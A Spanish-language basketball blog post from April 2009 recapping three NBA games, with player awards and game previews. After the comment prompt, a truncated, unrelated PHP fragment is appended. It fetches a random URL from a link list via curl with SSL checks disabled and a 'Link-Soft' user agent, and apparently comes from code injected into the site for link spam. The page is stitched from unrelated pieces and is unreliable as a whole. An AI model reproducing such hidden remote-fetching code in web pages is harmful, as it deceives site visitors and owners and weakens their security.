La crónica(09-04-09)

10 de April de 2009 por Viva_Dirk

Como cada jueves tenemos pocos pero muy interesantes partidos, esta noche concretamente 3.

En Chicago los Sixers no pudieron acercarse al 5º puesto que ocupan actualmente los Heat. Los Bulls se afianzan en el 7º puesto y miran de reojo el 6º aunque entre esos dos no parece que el cruce sea muy distinto salvo que Garnett siga con problemas físicos. En el encuentro de ayer vimos a unos Bulls en su mejor versión, con Rose dirigiendo bien, Gordon anotando y los 3 hombres del juego interior aportando 47 puntos, 17 rebotes y 8 asistencias, además todo el equipo hizo un impecable 19 de 19 en tiros libres, que fue donde mas fallaron los Sixers con un 16 de 27.

Los Rockets consiguieron una cómoda victoria frente a Sacramento con hasta 6 jugadores en dobles dígitos de anotación y con la pareja Yao&Artest a pleno rendimiento. Por los Kings buen partido de su duo interior de jóvenes que son sin duda la mejor noticia de la temporada.

Y en el partido del dia los Lakers vencieron a los Nuggets con cierta solvencia y con Bynum de vuelta, grandísima noticia para todos los aficionados amarillos y muy mala para el resto. Bynum jugó 21 minutos en los que anotó 16 puntos, capturó 7 rebotes y cometió 5 faltas. Kobe estuvo letal tanto anotando en la distancia como forzando penetraciones y faltas, mientras Gasol dominaba en ambos tableros y conseguia su mejor marca en rebotes con 19, nada menos que 11 de ellos ofensivos, completados con 27 puntos. En Denver buen partido de todos los pesos pesados y echando de menos a Martin, demostraron porque estan donde están.

Premios

MVP: Hoy es innegable, 27 puntos, 19 rebotes y 3 asistencias con 9 de 11 en tiros libres son los numeritos de nuestro Pau Gasol. Ben Gordon, Artest  y Kobe quedan lejos.

Rookie: Jason Thompson hizo otro buen partido, 16 puntos, 10 rebotes(8 ofensivos) y 3 asistencias, estaremos muy pendientes de el la siguiente temporada.  El premio para el que es ahora mismo el máximo candidato a rookie del año con los Bulls en play-offs, ayer 16 puntos y 8 rebotes con un 8 de 10 en tiros de 2, si realmente puede mejorar su tiro exterior…en Chicago tienen mucho andado.

La Sorpresa: Ver a Tyrus Thomas anotar 14 tiros libres de 14 intentados es algo que dudo volvamos a ver en toda su carrera. Tras un buen parón Andrew Bynum volvió y lo hizo bien.

La Decepción: Trevor Ariza atraviesa una mala racha y prueba de ello es su partido de ayer, partiendo como titular disputó 19 minutos en los que hizo un 1 de 8 en tiros y capturó 1 rebote.

Mayor Esfuerzo en Vano: Andre Iguodala y Spencer Hawes hicieron todo lo que estuvo en su mano. El alero se quedó cerca del triple doble con 19 puntos, 7 rebotes y 10 asistencias, mientras que el pivot hizo un 22-11 frente a Yao Ming.

Razones para trasnochar

Todos los viernes hay mucho para recomendar, nos decantamos por los líderes de cada conferencia.

Cavs VS Sixers: Lebron y los suyos visitan la incomoda cancha de los Sixers con estos inmersos en la pelea por la quinta plaza. Dando por hecho que Lebron hará lo suyo habrá que fijarse en la batalla de bases.

Lakers VS Blazers: Los Lakers ofrecen un pésimo rendimiento en el Rose Garden y eso jugandose lo que se juegan deben dejarlo a un lado esta noche. Es muy posible que coincidan en pista durante muchos minutos Bynum y Oden, destinados a sufrirse mutuamente durante la próxima década.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>